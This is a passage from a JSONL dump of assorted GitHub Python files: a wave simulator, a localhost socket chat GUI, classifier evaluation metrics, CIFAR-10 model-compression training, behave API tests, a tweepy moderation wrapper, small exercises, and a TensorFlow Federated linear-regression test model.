autoAck=True)\nsk.loop()\n","repo_name":"stevenfoong/skype-rocketchat-bridge","sub_path":"rocketchat-bridge.py","file_name":"rocketchat-bridge.py","file_ext":"py","file_size_in_byte":11099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74301983800","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom Wave import Wave\nfrom WaveGraphBase import WaveGraphBase\n\nPI = np.pi\n\nsliderDataList = [{'name': 'Source amplitude', 'min': 0.1, 'max': 8.0, 'init': 2, 'step': 0.01},\n {'name': 'Source period', 'min': 0.1, 'max': 8 * PI, 'init': 2 * PI, 'step': 0.01},\n {'name': 'Left tension', 'min': 0.1, 'max': 8.0, 'init': 1, 'step': 0.01},\n {'name': 'Right tension', 'min': 0.1, 'max': 8.0, 'init': 2, 'step': 0.01},\n {'name': 'Left mass density', 'min': 0.1, 'max': 8.0, 'init': 1, 'step': 0.01},\n {'name': 'Right mass density', 'min': 0.1, 'max': 8.0, 'init': 0.5, 'step': 0.01},\n {'name': 'Simulation speed', 'min': 0.001, 'max': 2.0, 'init': 0.1, 'step': 0.001},\n {'name': 'Line thickness', 'min': 1, 'max': 10, 'init': 5, 'step': 0.1}]\n\ncheckboxDataList = [{'name': 'Source wave', 'init': True},\n {'name': 'Reflected wave', 'init': True},\n {'name': 'Transmitted wave', 'init': True},\n {'name': 'Source + reflected', 'init': False}]\n\nwaveList = [Wave(amplitude=2, period=2*PI, direction=1),\n None,\n None,\n None]\n\n\nclass WavesChangingMedium(WaveGraphBase):\n def __init__(self, name='Waves medium boundary', granularity=2048, x_range=4 * PI, x_offset=0, y_range=6, y_offset=0, time_factor=0.1, line_thickness=5, waves=[], slider_data=[], checkbox_data=[], tension=2, mass_density=0.5):\n super().__init__(name, granularity, x_range, x_offset, y_range, y_offset, time_factor, line_thickness, waves, slider_data, checkbox_data)\n self.tension = tension\n self.mass_density = mass_density\n\n def update(self, event=None):\n self.waves[0].amplitude = self.sliders[0].val\n self.waves[0].period = self.sliders[1].val\n self.waves[0].tension = self.sliders[2].val\n self.tension = self.sliders[3].val\n self.waves[0].mass_density = self.sliders[4].val\n self.mass_density = self.sliders[5].val\n self.time_factor = self.sliders[6].val\n self.line_thickness = self.sliders[7].val\n self.checkboxes_ticked = self.checkbox.get_status()\n\n def animate(self, i):\n self.waves[1] = self.waves[0].get_reflected_wave(self.tension, self.mass_density)\n self.waves[2] = self.waves[0].get_transmitted_wave(self.tension, self.mass_density)\n\n self.y_data[0] = self.waves[0].get_y_array(i * self.time_factor, self.x_data, static_show=[-self.x_range, 0])\n self.y_data[1] = self.waves[1].get_y_array(i * self.time_factor, self.x_data, static_show=[-self.x_range, 0])\n self.y_data[2] = self.waves[2].get_y_array(i * self.time_factor, self.x_data, static_show=[(-3*self.x_range-1)/self.granularity, self.x_range])\n self.y_data[3] = [x + y for x, y in zip(self.y_data[0], self.y_data[1])]\n\n for j in range(len(self.y_data)):\n if self.checkboxes_ticked[j]:\n plt.setp(self.lines[j], linewidth=self.line_thickness)\n else:\n plt.setp(self.lines[j], linewidth=0)\n\n self.lines[j].set_data(self.x_data, self.y_data[j])\n\n return self.patches\n\n\ngraph = WavesChangingMedium(waves=waveList, slider_data=sliderDataList, 
checkbox_data=checkboxDataList)\ngraph.start()\n","repo_name":"Karlovsky120/SimpleWaveSimulator","sub_path":"WaveMediumBoundary.py","file_name":"WaveMediumBoundary.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37328270057","text":"from tkinter import *\r\nfrom socket import *\r\nimport _thread\r\nimport threading\r\n\r\n
def initialize_server(portNum):\r\n    global conn, addr, s, listenMsg\r\n    conn = 0\r\n    addr = 0\r\n    s = socket(AF_INET, SOCK_STREAM)\r\n    host = 'localhost'\r\n    port = portNum\r\n    print(f\"initialize_server listening on port {port}\")\r\n    s.bind((host, port))\r\n    s.listen(5)\r\n    listenMsg.grid(row = 8, column= 0)\r\n    listenMsg.place(x=150, y = 35)\r\n    _thread.start_new_thread(handle, ())\r\n    return conn\r\n
def handle():\r\n    global conn,addr, successfulConnectionMsg, listenMsg\r\n    while True:\r\n        conn, addr = s.accept()\r\n        successfulConnectionMsg.grid(row = 8, column= 0)\r\n        successfulConnectionMsg.place(x=120, y = 56)\r\n        listenMsg.after(1000, listenMsg.destroy)\r\n        successfulConnectionMsg.after(2500, successfulConnectionMsg.destroy)\r\n
def update_chat(msg, state):\r\n    global chatlog\r\n    chatlog.config(state=NORMAL)\r\n    if state==0:\r\n        chatlog.insert(END, 'YOU: ' + msg)\r\n    else:\r\n        chatlog.insert(END, 'CLIENT: ' + msg)\r\n    chatlog.config(state=DISABLED)\r\n    chatlog.yview(END)\r\n
def checkPortNum(portNum):\r\n    if(portNum == ''):\r\n        return \"empty\"\r\n    portNum = int(portNum)\r\n    if(portNum > 65535 or portNum < 0):\r\n        portNum=\"incorrectPortNum\"\r\n    return portNum\r\n
def listen():\r\n    global entry\r\n    global errorMsgLabel\r\n    global emptyErrorMsgLabel\r\n    global conn\r\n    global chatlog\r\n    global emptyError\r\n    global incorrectPortNum\r\n    global emptyPortNum\r\n    global successfulConnectionMsg\r\n    emptyErrorMsgLabel.after(5000, emptyErrorMsgLabel.destroy)\r\n    errorMsgLabel.after(5000, errorMsgLabel.destroy)\r\n    userPortNum = entry.get()\r\n    portNum = checkPortNum(userPortNum)\r\n    if(portNum == \"empty\"):\r\n        emptyErrorMsgLabel.grid(row = 8, column= 0)\r\n        emptyErrorMsgLabel.place(x=80, y = 36)\r\n        return\r\n    if(portNum == \"incorrectPortNum\"):\r\n        print(portNum)\r\n        errorMsgLabel.grid(row = 8, column= 0)\r\n        errorMsgLabel.place(x=70, y = 56)\r\n        return\r\n    print(\"BEFORE conn\")\r\n    print(type(portNum))\r\n    # pass the callable and its argument; calling initialize_server() here\r\n    # would run it in this thread and hand Thread its return value instead\r\n    thread = threading.Thread(target=initialize_server, args=(portNum,))\r\n    thread.start()\r\n    print(\"After conn\")\r\n
def send():\r\n    global textbox\r\n    global conn\r\n    msg = textbox.get(\"0.0\", END)\r\n    update_chat(msg, 0)\r\n    conn.send(msg.encode('ascii'))\r\n    textbox.delete(\"0.0\", END)\r\n
def receive():\r\n    while 1:\r\n        try:\r\n            data = conn.recv(1024)\r\n            msg = data.decode('ascii')\r\n            if msg != \"\":\r\n                update_chat(msg, 1)\r\n        except:\r\n            pass\r\n
def msgPress(event):\r\n    send()\r\n
def listenPress(event):\r\n    listen()\r\n\r\n
def GUI():\r\n    global chatlog\r\n    global textbox\r\n    global entry\r\n    global errorMsgLabel\r\n    global incorrectPortNum\r\n    global conn\r\n    global emptyPortNum\r\n    global emptyErrorMsgLabel\r\n    global successfulConnectionMsg, listenMsg\r\n    incorrectPortNum = False\r\n    emptyPortNum = False\r\n    gui = Tk()\r\n    gui.title(\"Server Chat Box\")\r\n    gui.geometry(\"980x430\")\r\n    chatlog = Text(gui, bg='grey')\r\n    chatlog.config(state=DISABLED)\r\n\r\n    # buttons to send messages\r\n    sendbutton = Button(gui, bg='grey', fg='white', text='SEND', command=send)\r\n    listenBtn = Button(gui, bg='grey', fg= 'white', text='Listen', command=listen)\r\n    portLabel = 
Label(gui, text=\"Port Number: \")\r\n errorMsgLabel = Label(gui, text=\"Incorrect Port Entered.\")\r\n emptyErrorMsgLabel = Label(gui, text=\"Port Not Entered. Try Again\")\r\n successfulConnectionMsg = Label(gui, text=\"Connection Built.\")\r\n listenMsg = Label(gui, text=\"Listening.\")\r\n entry = Entry(gui)\r\n textbox = Text(gui, bg='grey')\r\n portLabel.grid(row=6, column=0)\r\n portLabel.place(x=1, y=4)\r\n entry.grid(row = 6, column=0)\r\n listenBtn.grid(row = 6, column= 0)\r\n entry.place(x=80, y=6, height=20, width=800)\r\n listenBtn.place(x=900, y= 3)\r\n chatlog_y = 30\r\n chatlog.place(x=6, y=chatlog_y, height=356, width=965)\r\n textbox.place(x=6, y=401, height=20, width=865)\r\n sendbutton.place(x=900, y=401, height=20, width=50)\r\n textbox.bind(\"\", msgPress)\r\n listenBtn.bind(\"\", listenPress)\r\n _thread.start_new_thread(receive, ())\r\n gui.mainloop()\r\nif __name__ == '__main__':\r\n chatlog = textbox = None\r\n #conn = initialize_server(1234)\r\n GUI()","repo_name":"ZiyaanAli/ZiyaanAli_Chat_Messenger-CN","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39654447709","text":"import torch\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\ndef get_accuracy_bow(model,loader):\r\n y_preds = list()\r\n y_real = list()\r\n with torch.no_grad():\r\n for x, y in loader:\r\n y_preds.extend(model(x).argmax(dim=1).numpy().tolist())\r\n y_real.extend(y)\r\n return np.sum(np.array(y_preds)==y_real)/len(y_real),y_real,y_preds\r\n\r\ndef get_accuracy_bilstm(model,loader):\r\n y_preds = list()\r\n y_real = list()\r\n with torch.no_grad():\r\n for x, y, lengths in loader:\r\n y_preds.extend(model(x,lengths).argmax(dim=1).numpy().tolist())\r\n y_real.extend(y)\r\n return np.sum(np.array(y_preds)==y_real)/len(y_real),y_real,y_preds\r\n\r\ndef get_accuracy_test(model,model_type,x,y,lengths):\r\n with torch.no_grad():\r\n if model_type=='bow':\r\n y_preds = model(x).argmax(dim=1)\r\n return np.sum(y_preds.numpy()==y)/len(y),y_preds\r\n if model_type=='bilstm':\r\n y_preds = model(x,lengths).argmax(dim=1)\r\n return np.sum(y_preds.numpy()==y)/len(y),y_preds\r\n if model_type=='bow_bilstm':\r\n y_preds = model(x,lengths).argmax(dim=1)\r\n return np.sum(y_preds.numpy()==y)/len(y),y_preds\r\n\r\ndef get_accuracy_ens_bow(models,x,y):\r\n accs = list()\r\n y_preds_sum = list()\r\n for i in range(len(y)):\r\n y_preds_sum.append(dict())\r\n with torch.no_grad():\r\n for model_index in range(len(models)):\r\n y_preds = models[model_index](x).argmax(dim=1)\r\n accs.append(np.sum(y_preds.numpy()==y)/len(y))\r\n for i in range( len(y_preds.numpy().tolist()) ):\r\n if y_preds.numpy().tolist()[i] in y_preds_sum[i]:\r\n y_preds_sum[i][y_preds.numpy().tolist()[i]] += 1\r\n else:\r\n y_preds_sum[i][y_preds.numpy().tolist()[i]] = 1\r\n y_preds_ens = list()\r\n for i in range(len(y_preds_sum)):\r\n sort_list = list(y_preds_sum[i].items())\r\n sort_list.sort(key=lambda x:x[1],reverse=True)\r\n y_preds_ens.append(sort_list[0][0])\r\n accs.append( np.sum(np.array(y_preds_ens)==y)/len(y) )\r\n return accs,y_preds_ens\r\n\r\ndef get_accuracy_ens_bilstm(models,x,y,lengths):\r\n accs = list()\r\n y_preds_sum = list()\r\n for i in range(len(y)):\r\n y_preds_sum.append(dict())\r\n with torch.no_grad():\r\n for model_index in range(len(models)):\r\n y_preds = models[model_index](x,lengths).argmax(dim=1)\r\n accs.append(np.sum(y_preds.numpy()==y)/len(y))\r\n for i in 
range( len(y_preds.numpy().tolist()) ):\r\n                if y_preds.numpy().tolist()[i] in y_preds_sum[i]:\r\n                    y_preds_sum[i][y_preds.numpy().tolist()[i]] += 1\r\n                else:\r\n                    y_preds_sum[i][y_preds.numpy().tolist()[i]] = 1\r\n    y_preds_ens = list()\r\n    for i in range(len(y_preds_sum)):\r\n        sort_list = list(y_preds_sum[i].items())\r\n        sort_list.sort(key=lambda x:x[1],reverse=True)\r\n        y_preds_ens.append(sort_list[0][0])\r\n    accs.append( np.sum(np.array(y_preds_ens)==y)/len(y) )\r\n    return accs,y_preds_ens\r\n\r\n
def get_confusion_matrix(y_real,y_preds,size):\r\n    # Pandas settings\r\n    pd.set_option('display.max_columns', None)\r\n    pd.set_option('display.max_rows', None)\r\n    pd.set_option('display.width', 100)\r\n    pd.set_option('expand_frame_repr', False)\r\n    pd.set_option('max_colwidth',100)\r\n    mat = np.zeros( (size,size) , dtype=np.dtype(np.int32))\r\n    for i in range(len(y_real)):\r\n        if y_real[i]==y_preds[i]:\r\n            mat[y_real[i]-1][y_real[i]-1] += 1\r\n        else:\r\n            mat[y_real[i]-1][y_preds[i]-1] += 1\r\n    return pd.DataFrame(mat)\r\n\r\n
def get_micro_f1(conf_mat):\r\n    mat = np.array(conf_mat)\r\n    tp,fp,fn = list(),list(),list()\r\n    for i in range(np.size(mat,0)):\r\n        tp.append(mat[i][i])\r\n        # false positives for class i live in column i (everything predicted as i)\r\n        fp.append(np.sum(mat[:, i]) - mat[i][i] )\r\n        # false negatives live in row i (everything that truly is i)\r\n        fn.append(np.sum(mat[i, :]) - mat[i][i] )\r\n    tp_sum = np.sum(np.array(tp))\r\n    fp_sum = np.sum(np.array(fp))\r\n    fn_sum = np.sum(np.array(fn))\r\n    precision = tp_sum/(tp_sum+fp_sum)\r\n    recall = tp_sum/(tp_sum+fn_sum)\r\n    return 2*precision*recall/(precision+recall)\r\n\r\n
def get_macro_f1(conf_mat):\r\n    mat = np.array(conf_mat)\r\n    precision,recall = list(),list()\r\n    f1 = list()\r\n    for i in range(np.size(mat,0)):\r\n        tp=mat[i][i]\r\n        fp=np.sum(mat[:, i]) - mat[i][i]  # column i: predicted as class i\r\n        fn=np.sum(mat[i, :]) - mat[i][i]  # row i: truly class i\r\n        p,r=0,0\r\n        if tp!=0 or fp!=0:\r\n            p=tp/(tp+fp)\r\n            precision.append(tp/(tp+fp))\r\n        if tp!=0 or fn!=0:\r\n            r=tp/(tp+fn)\r\n            recall.append(tp/(tp+fn))\r\n        if p!=0 or r!=0:\r\n            f1.append(2*p*r/(p+r))\r\n        else:\r\n            f1.append(0)\r\n    pre_avg = np.mean(np.array(precision))\r\n    rec_avg = np.mean(np.array(recall))\r\n    return 2*pre_avg*rec_avg/(pre_avg+rec_avg),f1","repo_name":"GenoZhang624/text-mining","sub_path":"Coursework1/src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39977339079","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nfrom catalyst import dl\nfrom pytorchcv.model_provider import get_model\nimport os\nfrom torch_integral import IntegralWrapper, grid_tuning, TrainableGrid1D\n\n\n
def nin_cifar10(pretrained=True):\n    net = get_model(\"nin_cifar10\", pretrained=pretrained)\n    net.features.stage2.dropout2 = torch.nn.Identity()\n    net.features.stage3.dropout3 = torch.nn.Identity()\n\n    return net\n\n\n
# DATA\nbatch_size = 128\n\n
augmentation = transforms.Compose(\n    [\n        transforms.ToTensor(),\n        transforms.RandomHorizontalFlip(),\n        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n    ]\n)\n
preprocess = transforms.Compose(\n    [\n        transforms.ToTensor(),\n        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n    ]\n)\n\n
root = os.path.expanduser(\"~\") + \"/datasets/\"\ntrain_dataset = torchvision.datasets.CIFAR10(\n    root=root, train=True, download=True, transform=augmentation\n)\ntrain_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size, shuffle=True)\n\n
val_dataset = torchvision.datasets.CIFAR10(\n    root=root, 
train=False, download=True, transform=preprocess\n)\nval_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size, shuffle=False)\nloaders = {\"train\": train_dataloader, \"valid\": val_dataloader}\n\n# ------------------------------------------------------------------------------------\n# Model\n# ------------------------------------------------------------------------------------\nmodel = nin_cifar10().cuda()\ncontinuous_dims = {}\n\nfor name, mod in model.named_modules():\n if \"stage3\" in name:\n if not isinstance(mod, torch.nn.BatchNorm2d):\n if hasattr(mod, \"weight\"):\n continuous_dims[name + \".weight\"] = [0, 1]\n if hasattr(mod, \"bias\"):\n continuous_dims[name + \".bias\"] = [0]\n\nmodel = IntegralWrapper(\n init_from_discrete=True,\n fuse_bn=True,\n verbose=True,\n)(model, [1, 3, 32, 32], continuous_dims)\n\n# ------------------------------------------------------------------------------------\n# Train\n# ------------------------------------------------------------------------------------\ncross_entropy = nn.CrossEntropyLoss()\nlog_dir = \"./logs/cifar\"\nrunner = dl.SupervisedRunner(\n input_key=\"features\", output_key=\"logits\", target_key=\"targets\", loss_key=\"loss\"\n)\ncallbacks = [\n dl.AccuracyCallback(\n input_key=\"logits\", target_key=\"targets\", topk=(1,), num_classes=10\n ),\n dl.SchedulerCallback(mode=\"batch\", loader_key=\"train\", metric_key=\"loss\"),\n]\nloggers = []\nepochs = 10\n\nfor group in model.groups:\n if \"operator\" not in group.operations:\n n = group.size\n new_size = int(float(n) * 0.5)\n group.reset_grid(TrainableGrid1D(new_size))\n\nprint(\"compression: \", model.eval().calculate_compression())\n\nwith grid_tuning(model, False, True):\n opt = torch.optim.Adam(model.parameters(), lr=1e-3, weight_decay=0)\n epoch_len = len(train_dataloader)\n sched = torch.optim.lr_scheduler.MultiStepLR(\n opt, [epoch_len * 2, epoch_len * 5, epoch_len * 6, epoch_len * 8], gamma=0.33\n )\n runner.train(\n model=model,\n criterion=cross_entropy,\n optimizer=opt,\n scheduler=sched,\n loaders=loaders,\n num_epochs=epochs,\n callbacks=callbacks,\n loggers=loggers,\n logdir=log_dir,\n valid_loader=\"valid\",\n valid_metric=\"loss\",\n verbose=True,\n )\n\n# ------------------------------------------------------------------------------------\n# Eval\n# ------------------------------------------------------------------------------------\nmetrics = runner.evaluate_loader(\n model=model, loader=loaders[\"valid\"], callbacks=callbacks[:1]\n)\n","repo_name":"TheStageAI/TorchIntegral","sub_path":"examples/classification/nin_cifar.py","file_name":"nin_cifar.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"40"} +{"seq_id":"30253155952","text":"puisi = open(\"Puisi.txt\",\"r\")\nread_method1 = puisi.readlines() # read and return list\nread_method2 = puisi.read() # read and return string\nfor text in read_method1:\n print(text)\npuisi.close()\n\n# # write files\n# name = input(\"Name -> \")\n# age = input(\"Age -> \")\n# address = input(\"address -> \")\n# # format\n# teks = \"Name => {}\\nAge => {}\\nAddress => {}\".format(name,age,address)\n# teks2 = [\"sapi\",\"udang\",\"Sapi\",\"kerbau\"]\n# # open\n# file_bio = open(\"biodata.txt\",\"w\")\n# file_bio2 = open(\"biodata2.txt\",\"w\")\n# # write\n# file_bio.write(teks) # all str\n# file_bio.writelines(teks2) # list\n# file_bio2.close()\n# 
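alternatively, a with block closes the file automatically:\n# with open(\"biodata.txt\",\"w\") as f:\n#     f.write(teks)\n# 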
file_bio.close()\n","repo_name":"SemmiDev/Python-Basic","sub_path":"petanikode/files/FileReaderAndWriter/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13625179037","text":"from behave import *\nimport os\nimport requests\nimport signal\nimport time\nimport json\n\n# service expose according to http://192.168.49.2:32248/gatito\n@given('a valid user is logged in for gatito')\ndef step_impl(context):\n pass\n\n@when('the user sends a get request for gatito')\ndef step_impl(context):\n print(\"checking API /gatito\")\n context.url = 'http://192.168.49.2:32248/gatito'\n context.headers = {'content-type': 'application/json'}\n context.response = requests.get(context.url) \n print(context.response) # This is the response status code \n print(context.response.content.decode('utf8')) # This is the body response code \n print()\n assert True is not False\n # might check if there is a valid response assert context.response.status_code is not null \n\n@Then('the user obtains a 200 OK for gatito')\ndef step_impl(context):\n print(\"checking response status code\")\n # if the response code is not 200 we are failing the step\n assert context.response.status_code == 200, \"Response code is different: %s\" % context.response.status_code + \" Error: \" + str(context.response.content)\n\n@Then('the user obtains miau')\ndef step_impl(context):\n print('checking response body de gatito')\n body = context.response.content.decode('utf8') # get the body \n data = json.loads(body) # get the json format for the body \n print(body)\n print(data)\n print(data['gatito']) # print the value of the element gatito \n # if gatito does have miau miau! 
as a response the scenario fails\n    assert data['gatito'] == 'miau miau!', \"code is different: %s\" % context.response.content + \" Error: \" + str(context.response.content)\n\n","repo_name":"robertolegido/DEMO_PYTHON_FLASK","sub_path":"AUTO/features/steps/gatito_steps.py","file_name":"gatito_steps.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45881012225","text":"import config as cfg\nimport tweepy\n\n\n
def config_setup():\n    return TwitterObj(cfg.BEARER_TOKEN,cfg.CONSUMER_API_KEY,\n            cfg.CONSUMER_API_KEY_SECRET,cfg.ACCESS_TOKEN,cfg.ACCESS_TOKEN_SECRET)\n\n
class TwitterObj:\n    def __init__(self,bearer_token,\n                consumer_key,consumer_secret,\n                acces_token,acces_token_secret):\n        self._bearer_token = bearer_token\n        self._consumer_key = consumer_key\n        self._consumer_key_secret = consumer_secret\n        self._access_token = acces_token\n        self._access_token_secret = acces_token_secret\n\n
    def create_twitter_obj(self):\n        self._client = tweepy.Client(bearer_token=self._bearer_token,\n        consumer_key=self._consumer_key, consumer_secret=self._consumer_key_secret,\n        access_token=self._access_token,access_token_secret=self._access_token_secret)\n\n        self._auth = tweepy.OAuth1UserHandler(\n        consumer_key=self._consumer_key, consumer_secret=self._consumer_key_secret,\n        access_token=self._access_token,access_token_secret=self._access_token_secret)\n\n        self._api = tweepy.API(auth=self._auth)\n\n
    def find_user_tweets(self,name,count = 100):\n        tweets = self._api.user_timeline(screen_name=name,\n                                count=count+2,\n                                include_rts = False,\n                                tweet_mode = 'extended'\n                                )\n        return tweets\n\n
    def find_replies(self,tweet_id,items):\n        replies=[]\n        for tweet in tweepy.Cursor(self._api.search_tweets,q='to:'+self.username).items(items):\n            if hasattr(tweet, 'in_reply_to_status_id_str'):\n                if (tweet.in_reply_to_status_id_str==tweet_id):\n                    replies.append(tweet)\n        if(not replies): return None\n        return replies\n\n
    def disable_eveything_from_user(self,reply_id,user_id):\n        self._client.block(user_id)\n        self._client.mute(user_id)\n        self._client.hide_reply(reply_id)\n\n
    def set_username(self,username):\n        self.username = username\n\n\n
# # client.delete_tweet(id=1550908991513006083)\n# # client.mute()\n# # client.hide_reply(id=1549745844638949376)\n# test.client.block()\n# test.client.hide_reply()\n# test.client.mute()\n\n","repo_name":"Jakaroo17/twitter-filter","sub_path":"twitter_part.py","file_name":"twitter_part.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6294579398","text":"#from math import pow\n#while True:\n#    broj = input(\"Enter the length of the cube's edge, or q to quit: \")\n#    if broj == \"q\":\n#        break\n#    else:\n#        rezultat = pow(float(broj), 3)\n#        print(\"The result is \" + str(rezultat))\n\n\n
#Write a program that reads two names and builds a new name from the first\n# three letters of the first name and the last three letters of the second.\n#Example:\n#Input:\n#Marina\n#Darija\n#Output:\n#Marija\n\n\n
prvo_ime = input(\"\")\ndrugo_ime = input(\"\")\nrezultat = prvo_ime[0:3] + drugo_ime[-3:]\nprint(rezultat)\n\n\n\n
#s = {1,2,3,4,5}\n#print(\"{}\".format(s[0]))\n\n#print(\"{}\".format({1,2,3} & 
{3,4,5}))\n\n\n\n","repo_name":"zeidombo/courses","sub_path":"Other/School/rasprava.py","file_name":"rasprava.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13264807876","text":"# Character Traits\nSTR = \"Strength\"\nDEX = \"Dexterity\"\nCON = \"Constitution\"\nINT = \"Intelligence\"\nWIS = \"Wisdom\"\nCHA = \"Charisma\"\n\nskillTypes = [STR, DEX, CON, INT, WIS, CHA]\n\nSPD = \"Speed\"\nAC = \"Armor Class\"\n\nPROF = \"Proficiencies\"\nABIL = \"Abilities\"\n\n# Skills\nACROBATICS = \"Acrobatics\"\nANIMAL_HANDLING = \"Animal Handling\"\nARCANA = \"Arcana\"\nATHLETICS = \"Athletics\"\nDECEPTION = \"Deception\"\nHISTORY = \"History\"\nINSIGHT = \"Insight\"\nINTIMIDATION = \"Intimidation\"\nINVESTIGATION = \"Investigation\"\nMEDICINE = \"Medicine\"\nNATURE = \"Nature\"\nPERCEPTION = \"Perception\"\nPERFORMANCE = \"Performance\"\nPERSUASION = \"Persuasion\"\nRELIGION = \"Religion\"\nSLIGHT_OF_HAND = \"Slight of Hand\"\nSTEALTH = \"Stealth\"\nSURVIVAL = \"Survival\"\n\n\n# Classes\nFIGHTER = \"Fighter\"\n\n\n# Race Traits\nSML = \"Small\"\nMED = \"Medium\"\nLRG = \"Large\"\n\nraceSizes = [SML, MED, LRG]\n\n# Races\nHUMAN = \"Human\"\nELF = \"ELF\"\n\n# Languages\nCMN = \"Common\"\n\n# Definitions\nCANTRIP = \"Cantrip\"\n\n# Item types\nARMOR = \"Armor\"\nSHIELD = \"Shield\"\nWEAPON = \"Weapon\"\nSIMPLE = \"Simple\"\nMARTIAL = \"Martial\"\nMELEE = \"Melee\"\nRANGED = \"Ranged\"\nEQUIPMENT = \"Equipment\"\nLIGHT = \"Light\"\nMEDIUM = \"Medium\"\nHEAVY = \"Heavy\"\n\nitemTypes = [ARMOR, SHIELD, WEAPON, SIMPLE, MARTIAL, MELEE, RANGED, EQUIPMENT, LIGHT, MEDIUM, HEAVY]\n","repo_name":"dantan2000/DND_Discord_Bot","sub_path":"python/Types.py","file_name":"Types.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2433143587","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport functools\n\nimport tensorflow as tf\n\nfrom tensorflow_federated.python import core as tff\nfrom tensorflow_federated.python.learning import model\n\n\nclass LinearRegression(model.Model):\n \"\"\"Example of a simple linear regression implemented directly.\"\"\"\n\n # A tuple (x, y), where 'x' represent features, and 'y' represent labels.\n Batch = collections.namedtuple('Batch', ['x', 'y']) # pylint: disable=invalid-name\n\n def __init__(self, feature_dim=2):\n # Define all the variables, similar to what Keras Layers and Models\n # do in build().\n self._feature_dim = feature_dim\n # TODO(b/124070381): Support for integers in num_examples, etc., is handled\n # here in learning, by adding an explicit cast to a float where necessary in\n # order to pass typechecking in the reference executor.\n self._num_examples = tf.Variable(0, name='num_examples', trainable=False)\n self._num_batches = tf.Variable(0, name='num_batches', trainable=False)\n self._loss_sum = tf.Variable(0.0, name='loss_sum', trainable=False)\n self._a = tf.Variable(\n # N.B. 
The lambda is needed for use in defuns, see ValueError\n # raised from resource_variable_ops.py.\n lambda: tf.zeros(shape=(feature_dim, 1)),\n name='a',\n trainable=True)\n self._b = tf.Variable(0.0, name='b', trainable=True)\n # Define a non-trainable model variable (another bias term)\n # for code coverage in testing.\n self._c = tf.Variable(0.0, name='c', trainable=False)\n self._input_spec = LinearRegression.make_batch(\n x=tf.TensorSpec([None, self._feature_dim], tf.float32),\n y=tf.TensorSpec([None, 1.0], tf.float32))\n\n @property\n def trainable_variables(self):\n return [self._a, self._b]\n\n @property\n def non_trainable_variables(self):\n return [self._c]\n\n @property\n def local_variables(self):\n return [self._num_examples, self._num_batches, self._loss_sum]\n\n @property\n def input_spec(self):\n # Model expects batched input, but the batch dimension is unspecified.\n return self._input_spec\n\n @tf.contrib.eager.defun(autograph=False)\n def _predict(self, x):\n return tf.matmul(x, self._a) + self._b + self._c\n\n @tf.contrib.eager.defun(autograph=False)\n def forward_pass(self, batch, training=True):\n del training # Unused\n if isinstance(batch, dict):\n batch = self.make_batch(**batch)\n if not self._input_spec.y.is_compatible_with(batch.y):\n raise ValueError('Expected batch.y to be compatible with '\n '{} but found {}'.format(self._input_spec.y, batch.y))\n if not self._input_spec.x.is_compatible_with(batch.x):\n raise ValueError('Expected batch.x to be compatible with '\n '{} but found {}'.format(self._input_spec.x, batch.x))\n predictions = self._predict(batch.x)\n residuals = predictions - batch.y\n num_examples = tf.gather(tf.shape(predictions), 0)\n total_loss = 0.5 * tf.reduce_sum(tf.pow(residuals, 2))\n\n tf.assign_add(self._loss_sum, total_loss)\n tf.assign_add(self._num_examples, num_examples)\n tf.assign_add(self._num_batches, 1)\n\n average_loss = total_loss / tf.cast(num_examples, tf.float32)\n return model.BatchOutput(loss=average_loss, predictions=predictions)\n\n @tf.contrib.eager.defun(autograph=False)\n def report_local_outputs(self):\n return collections.OrderedDict([\n ('num_examples', self._num_examples),\n ('num_examples_float', tf.cast(self._num_examples, tf.float32)),\n ('num_batches', self._num_batches),\n ('loss', self._loss_sum / tf.cast(self._num_examples, tf.float32)),\n ])\n\n @property\n def federated_output_computation(self):\n\n @tff.federated_computation\n def fed_output(local_outputs):\n # TODO(b/124070381): Remove need for using num_examples_float here.\n return {\n 'num_examples':\n tff.federated_sum(local_outputs.num_examples),\n 'loss':\n tff.federated_mean(\n local_outputs.loss, weight=local_outputs.num_examples_float),\n }\n\n return fed_output\n\n @classmethod\n def make_batch(cls, x, y):\n \"\"\"Returns a `Batch` to pass to the forward pass.\"\"\"\n return cls.Batch(x, y)\n\n\nclass TrainableLinearRegression(LinearRegression, model.TrainableModel):\n \"\"\"A LinearRegression with trivial SGD training.\"\"\"\n\n @tf.contrib.eager.defun(autograph=False)\n def train_on_batch(self, batch):\n # Most users won't implement this, and let us provide the optimizer.\n fp = self.forward_pass(batch)\n optimizer = tf.train.GradientDescentOptimizer(0.1)\n optimizer.minimize(fp.loss, var_list=self.trainable_variables)\n return fp\n\n\ndef _dense_all_zeros_layer(input_dims=None, output_dim=1):\n \"\"\"Create a 